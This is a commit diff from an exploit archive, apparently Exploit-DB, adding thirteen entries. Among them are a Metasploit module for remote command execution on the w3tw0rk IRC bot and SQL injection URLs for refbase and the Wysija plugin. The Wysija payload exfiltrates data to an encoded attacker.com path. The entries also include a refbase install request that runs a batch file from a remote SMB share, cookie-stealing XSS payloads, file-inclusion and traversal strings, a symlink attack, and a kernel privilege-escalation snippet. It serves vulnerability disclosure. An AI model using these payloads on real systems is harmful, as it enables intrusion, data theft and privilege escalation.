DB: 2015-09-24

13 new exploits

files.csv

@@ -34581,3 +34581,16 @@ id,file,description,date,author,platform,type,port
 38287,platforms/windows/local/38287.txt,"Kaspersky Antivirus ThinApp Parser Stack Buffer Overflow",2015-09-22,"Google Security Research",windows,local,0
 38288,platforms/windows/dos/38288.txt,"Kaspersky Antivirus _Yoda's Protector_ Unpacking Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0
 38289,platforms/windows/local/38289.txt,"Cisco AnyConnect Secure Mobility Client 3.1.08009 - Privilege Escalation",2015-09-22,"Google Security Research",windows,local,0
+38290,platforms/php/webapps/38290.txt,"WordPress flashnews Theme Multiple Input Validation Vulnerabilities",2013-02-02,MustLive,php,webapps,0
+38291,platforms/php/webapps/38291.txt,"EasyITSP 'voicemail.php' Directory Traversal Vulnerability",2013-02-04,"Michal Blaszczak",php,webapps,0
+38292,platforms/php/webapps/38292.txt,"refbase <= 0.9.6 - Multiple Vulnerabilities",2015-09-23,"Mohab Ali",php,webapps,0
+38294,platforms/php/webapps/38294.txt,"ezStats2 'style.php' Local File Include Vulnerability",2013-02-06,L0n3ly-H34rT,php,webapps,0
+38295,platforms/php/webapps/38295.txt,"ezStats for Battlefield 3 /ezStats2/compare.php Multiple Parameter XSS",2013-02-06,L0n3ly-H34rT,php,webapps,0
+38296,platforms/php/webapps/38296.txt,"WordPress CommentLuv Plugin '_ajax_nonce' Parameter Cross Site Scripting Vulnerability",2013-02-06,"High-Tech Bridge",php,webapps,0
+38297,platforms/php/webapps/38297.txt,"WordPress Wysija Newsletters Plugin Multiple SQL Injection Vulnerabilities",2013-02-06,"High-Tech Bridge",php,webapps,0
+38298,platforms/linux/local/38298.txt,"xNBD '/tmp/xnbd.log' Insecure Temporary File Handling Vulnerability",2013-02-06,"Sebastian Pipping",linux,local,0
+38299,platforms/windows/local/38299.c,"Symantec Encryption Desktop 10 Local Buffer Overflow Privilege Escalation Vulnerability",2012-02-25,"Nikita Tarakanov",windows,local,0
+38300,platforms/php/webapps/38300.txt,"WordPress Audio Player Plugin 'playerID' Parameter Cross Site Scripting Vulnerability",2013-01-31,hiphop,php,webapps,0
+38301,platforms/php/webapps/38301.txt,"WordPress Pinboard Theme 'tab' Parameter Cross Site Scripting Vulnerability",2013-02-09,"Henrique Montenegro",php,webapps,0
+38302,platforms/multiple/remote/38302.rb,"w3tw0rk / Pitbul IRC Bot  Remote Code Execution",2015-09-23,metasploit,multiple,remote,6667
+38303,platforms/osx/local/38303.c,"Cisco AnyConnect 3.1.08009 - Privilege Escalation via DMG Install Script",2015-09-23,"Yorick Koster",osx,local,0

platforms/linux/local/38298.txt

@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/57784/info
+
+xNBD is prone to a vulnerability because it handles temporary files in an insecure manner. 
+
+Local attackers may leverage this issue to perform symbolic-link attacks in the context of the affected application. Other attacks may also be possible.
+
+$ ln -s "${HOME}"/ATTACK_TARGET /tmp/xnbd.log
+
+  $ touch DISK
+  $ truncate --size=$((100*1024**2)) DISK
+
+  $ /usr/sbin/xnbd-server --daemonize --target DISK
+  xnbd-server(12462) msg: daemonize enabled
+  xnbd-server(12462) msg: cmd target mode
+  xnbd-server(12462) msg: disk DISK size 104857600 B (100 MB)
+  xnbd-server(12462) msg: xnbd master initialization done
+  xnbd-server(12462) msg: logfile /tmp/xnbd.log
+
+  $ ls -l ~/ATTACK_TARGET
+  -rw------- 1 user123 user123 653 Feb  1 16:41 \
+    /home/user123/ATTACK_TARGET

platforms/multiple/remote/38302.rb

@@ -0,0 +1,159 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'w3tw0rk / Pitbul IRC Bot  Remote Code Execution',
+      'Description'    => %q{
+          This module allows remote command execution on the w3tw0rk / Pitbul IRC Bot.
+        },
+      'Author'         =>
+        [
+          'Jay Turla'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'OSVDB', '120384' ],
+          [ 'EDB', '36652' ]
+        ],
+      'Platform'       => %w{ unix win },
+      'Arch'           => ARCH_CMD,
+      'Payload'        =>
+        {
+          'Space'    => 300, # According to RFC 2812, the max length message is 512, including the cr-lf
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd'
+            }
+        },
+      'Targets'  =>
+        [
+          [ 'w3tw0rk', { } ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Jun 04 2015',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(6667),
+        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
+        OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
+        OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
+      ], self.class)
+  end
+
+  def check
+    connect
+
+    res = register(sock)
+    if res =~ /463/ || res =~ /464/
+      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
+      return Exploit::CheckCode::Unknown
+    end
+
+    res = join(sock)
+    if !res =~ /353/ && !res =~ /366/
+      vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
+      return Exploit::CheckCode::Unknown
+    end
+
+    quit(sock)
+    disconnect
+
+    if res =~ /auth/ && res =~ /logged in/
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def send_msg(sock, data)
+    sock.put(data)
+    data = ""
+    begin
+      read_data = sock.get_once(-1, 1)
+      while !read_data.nil?
+        data << read_data
+        read_data = sock.get_once(-1, 1)
+      end
+    rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+    end
+
+    data
+  end
+
+  def register(sock)
+    msg = ""
+
+    if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?
+      msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
+    end
+
+    if datastore['NICK'].length > 9
+      nick = rand_text_alpha(9)
+      print_error("The nick is longer than 9 characters, using #{nick}")
+    else
+      nick = datastore['NICK']
+    end
+
+    msg << "NICK #{nick}\r\n"
+    msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"
+
+    send_msg(sock,msg)
+  end
+
+  def join(sock)
+    join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
+    send_msg(sock, join_msg)
+  end
+
+  def w3tw0rk_command(sock)
+    encoded = payload.encoded
+    command_msg = "PRIVMSG #{datastore['CHANNEL']} :!bot #{encoded}\r\n"
+    send_msg(sock, command_msg)
+  end
+
+  def quit(sock)
+    quit_msg = "QUIT :bye bye\r\n"
+    sock.put(quit_msg)
+  end
+
+  def exploit
+    connect
+
+    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
+    res = register(sock)
+    if res =~ /463/ || res =~ /464/
+      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
+      return
+    end
+
+    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
+    res = join(sock)
+    if !res =~ /353/ && !res =~ /366/
+      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
+      return
+    end
+
+    print_status("#{rhost}:#{rport} - Exploiting the IRC bot...")
+    w3tw0rk_command(sock)
+
+    quit(sock)
+    disconnect
+  end
+
+end

platforms/php/webapps/38290.txt

@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/57676/info
+
+The flashnews Theme for WordPress is prone to multiple input-validation vulnerabilities. 
+
+An attacker may leverage these issues to cause denial-of-service conditions, disclose sensitive information, upload arbitrary files to the affected computer, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/wp-content/themes/flashnews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg [XSS] 
+
+http://www.example.com/wp-content/themes/flashnews/thumb.php?src=http://site/big_file&h=1&w=1 
+
+http://www.example.com/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1 
+
+http://www.example.com/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/shell.php 
+
+http://www.example.com/wp-content/themes/flashnews/includes/test.php 
+
+http://www.example.com/wp-content/themes/flashnews/includes/test.php?a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E [XSS]

platforms/php/webapps/38291.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/57741/info
+
+EasyITSP is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. 
+
+Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to access arbitrary files in the context of the application. This may aid in further attacks. 
+
+EasyITSP 2.0.7 and prior versions are vulnerable.
+
+
+http://www.example.com/WEB/customer/voicemail.php?currentpage=phones&folder=../../

platforms/php/webapps/38292.txt

@@ -0,0 +1,114 @@
+# Exploit Title: Refbase <= 0.9.6 rss.php where parameter SQL Injection
+# Google Dork: "powered by refbase"
+# Date: 23 Sep 2015
+# Exploit Author: Mohab Ali
+# @0xAli
+# Vendor Homepage: http://www.refbase.net/index.php/Web_Reference_Database
+# Software Link: http://sourceforge.net/projects/refbase/
+# Reference: https://www.kb.cert.org/vuls/id/374092
+# Version: 0.8, 0.9, 0.9.5, 0.9.6
+# Tested on: WAMP (Windows)
+# CVE : CVE-2015-6009
+# Solution: Vulnerability hasn't been patched yet.
+
+**Summary **
+Refbase v 0.9.6 and earlier versions have an SQL injection vulnerability because of the insufficient validation when passing user supplied input to be passed to the database.
+
+
+** Vulnerable code **
+################################################################################
+#Line 35 : $queryWhereClause = $_REQUEST['where'];
+#Line 86 : $sanitizedWhereClause = extractWHEREclause(" WHERE " . $queryWhereClause);
+#Line 100: $sqlQuery .= " FROM $tableRefs WHERE " . $sanitizedWhereClause;
+#Line 123: $result = queryMySQLDatabase($query);
+################################################################################
+
+** Exploit POCs **
+/rss.php?where=1+and+5=(substr(@@version,1,1))-- -If it’s true then the mysql version is > 5
+/rss.php?where='nonexistent'+union+all(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat('version:',@@version,''),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50)-- -
+/rss.php?where='nonexistent'+union+all(select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41)-- -
+
+
+[!] Version 0.8 and 0.9 provide no validation, but versions 0.9.5 and 0.9.6 provide some filtering so you better let sqlmap handle it.
+[!] The GET parameter "where" is vulnerable to SQL injection despite being filtered by a custom function called extractWHEREclause() it’s still can be bypassed to inject other queries.
+The extractWHEREclause() function which is defined in include.inc.php and it removes any additional MySQL keywords.
+preg_replace("/^.*? WHERE (.+?)(?= ORDER BY| LIMIT| GROUP BY| HAVING| PROCEDURE| FOR UPDATE| LOCK IN|[ ;]+(SELECT|INSERT|UPDATE|DELETE|CREATE|ALTER|DROP|FILE)\b|$).*?$/i", "\\1", $query);
+But it can be bypassed.
+
+
+# Contacted vendor: 23 Dec 2014
+# Public disclosure: 23 Sep 2015 		
+
+################################################################################
+
+# Exploit Title: Refbase <= 0.9.6 install.php defaultCharacterSet parameter SQL Injection
+# Google Dork: "powered by refbase"
+# Public Disclosure Date: 21 Sep 2015
+# Exploit Author: Mohab Ali
+# @0xAli
+# Vendor Homepage: http://www.refbase.net/index.php/Web_Reference_Database
+# Software Link: http://sourceforge.net/projects/refbase/
+# Reference: https://www.kb.cert.org/vuls/id/374092
+# Version: 0.8, 0.9, 0.9.5, 0.9.6.
+# Tested on: WAMP (Windows)
+# CVE : CVE-2015-6009
+# Solution: Remove the install.php file after the installation
+
+**Summary **
+Refbase v 0.9.6 and earlier versions have an SQL injection vulnerability because of the insufficient validation when passing user supplied input to be passed to the database.
+
+[!] You have to know the correct MySQL credentials.
+
+** Vulnerable code **
+################################################################################
+#Line 77 :  $defaultCharacterSet = $_POST['defaultCharacterSet'];
+#Line 407: $queryCreateDB = $queryCreateDB . " DEFAULT CHARACTER SET " . $defaultCharacterSet;
+#Line 424: if (!($result = @ mysql_query ($queryCreateDB, $connection)))
+################################################################################
+
+** Exploit POC **
+
+Request:
+POST /install.php
+formType=install&submit=Install&adminUserName=root&adminPassword=pass&pathToMYSQL=C:\mysql5.6.17\bin\mysql.exe&databaseStructureFile=./install.sql&pathToBibutils=&defaultCharacterSet=SQL QUERY HERE&submit=Install
+
+################################################################################
+
+# Exploit Title: Refbase <= 0.9.6 install.php pathToMYSQL parameter RCE (Windows)
+# Google Dork: "powered by refbase"
+# Public Disclosure Date: 21 Sep 2015
+# Exploit Author: Mohab Ali
+# @0xAli
+# Vendor Homepage: http://www.refbase.net/index.php/Web_Reference_Database
+# Software Link: http://sourceforge.net/projects/refbase/
+# Reference: https://www.kb.cert.org/vuls/id/374092
+# Version: 0.9.6 and earlier. 0.6.1 and prior versions are not vulnerable.
+# Tested on: Windows
+# CVE : CVE-2015-6008
+# Solution: Remove the install.php file after the installation
+
+**Summary **
+Refbase v 0.9.6 and earlier versions have an RCE vulnerability because of the insufficient validation when passing user supplied input to be executed by the system.
+
+[!] You have to know the correct MySQL credentials and this doesn't appear to be exploitable on Linux since (AFAIK) it can't execute scripts remote smb shares by default.
+
+
+** Vulnerable code **
+################################################################################
+#Line 62: $pathToMYSQL = $_POST['pathToMYSQL'];
+#Line 67: $databaseStructureFile = $_POST['databaseStructureFile'];
+#Line 429: exec($pathToMYSQL . " -h " . $hostName . " -u " . $adminUserName . " -p" .$adminPassword . " --database=" . $databaseName . " < " . $databaseStructureFile . " 2>&1", $resultArray);
+################################################################################
+
+[*] pathToMYSQL and databaseStructureFile can't be empty, and has to be real file. And they can't contain ';' or '|'
+[*] To exploit this in Windows you can provide an executable on a remote share and execute it.
+
+** Exploit POC **
+
+Request:
+formType=install&submit=Install&adminUserName=root&adminPassword=123&pathToMYSQL=%5C%5CSERVER_IP%5CShare%5Cexec.bat&databaseStructureFile=.%2Finstall.sql&pathToBibutils=&defaultCharacterSet=latin1&submit=Install
+
+Executed command:
+\\SERVER_IP\Share\exec.bat -h localhost -u root -p123 --database=literature < ./install.sql 2>&1
+
+

platforms/php/webapps/38294.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/57757/info
+
+ezStats2 is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. 
+
+An attacker can exploit this vulnerability using directory-traversal strings to view files and execute local scripts in the context of the web server process. This may aid in further attacks.
+
+http://www.example.com/ezStats2_mohw/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg 
+
+http://www.example.com/ezServer/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg 
+
+http://www.example.com/ezStats2_psn/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg

platforms/php/webapps/38295.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/57759/info
+
+ezStats for Battlefield 3 is prone to multiple cross-site scripting vulnerabilities and a local file include vulnerability. 
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the web server process. 
+
+ezStats for Battlefield 3 0.91 is vulnerable; other versions may also be affected.
+
+http://www.example.com/ezStats2/compare.php?common=[XSS] 
+
+http://www.example.com/ezStats2/compare.php?rankings=[XSS]

platforms/php/webapps/38296.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/57771/info
+
+The CommentLuv plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. 
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+CommentLuv versions 2.92.3 and prior are vulnerable.
+
+<form action="http://www.example.com/wp-admin/admin-ajax.php" method="post" name="askform">
+<input type="hidden" name="action" value="cl_ajax" />
+<input type="hidden" name="do" value="fetch" />
+<input type="hidden" name="url" value="1" />
+<input type="hidden" name="_ajax_nonce" value='<script>alert(document.cookie);</script>'/>
+<input type="submit" id="btn">
+</form>

platforms/php/webapps/38297.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57775/info
+
+The Wysija Newsletters Plugin for WordPress is prone to multiple SQL-injection vulnerabilities. 
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+Wysija Newsletters 2.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wp-admin/admin.php?page=wysija_campaigns&orderby=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHA R(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114 )))) --

platforms/php/webapps/38300.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57848/info
+
+The Audio Player plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. 
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+Audio player versions prior to 2.0.4.6 are vulnerable.
+
+http://www.example.com/wp-content/plugins/audio-player/assets/player.swf?playerID=a\�))}catch(e){alert(1)}//

platforms/php/webapps/38301.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57873/info
+
+The Pinboard theme for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. 
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+Pinboard 1.0.6 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/wp-admin/themes.php?page=pinboard_options&tab= ]"><script>alert(document.cookie)</script>

platforms/windows/local/38299.c

@@ -0,0 +1,56 @@
+source: http://www.securityfocus.com/bid/57835/info
+
+Symantec Encryption Desktop is prone to a local buffer-overflow vulnerability. 
+
+A local attacker may exploit this issue to execute arbitrary code with escalated privileges.
+
+#define IO_CONTROL_VULN 0x80022058
+ 
+#define TARGET_DEVICE L"\\Device\\pgpwdef"
+ 
+[..]
+ 
+    usName.Buffer = TARGET_DEVICE;
+    usName.Length = usName.MaximumLength = 
+(USHORT)(wcslen(usName.Buffer) * sizeof(WCHAR));
+ 
+    InitializeObjectAttributes(&ObjAttr, &usName, OBJ_CASE_INSENSITIVE , 
+NULL, NULL);    
+ 
+ 
+    // get handle of target devide
+    ns = f_NtOpenFile(
+        &hDev,
+        FILE_READ_DATA | FILE_WRITE_DATA | SYNCHRONIZE,
+        &ObjAttr,
+        &StatusBlock,
+        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
+        FILE_SYNCHRONOUS_IO_NONALERT
+    );
+ 
+[..]
+ 
+    BOOL bStatus = DeviceIoControl(
+        hDev,
+        IO_CONTROL_VULN,
+        InBuff, 0x8,
+        OutBuff, 0x8,
+        &dwReturnLen, NULL
+    );
+ 
+    dwReturnLen = 0;
+    bStatus = DeviceIoControl(
+        hDev,
+        IO_CONTROL_VULN,
+        InBuff, sizeof(PVOID),
+        (PUCHAR)m_HalDispatchTable, 0,
+        &dwReturnLen, NULL
+    );
+ 
+[..]
+ 
+    f_NtQueryIntervalProfile(ProfileTotalIssues, &Interval);
+ 
+[..]
+ 
+Your evil code processes with CPL==0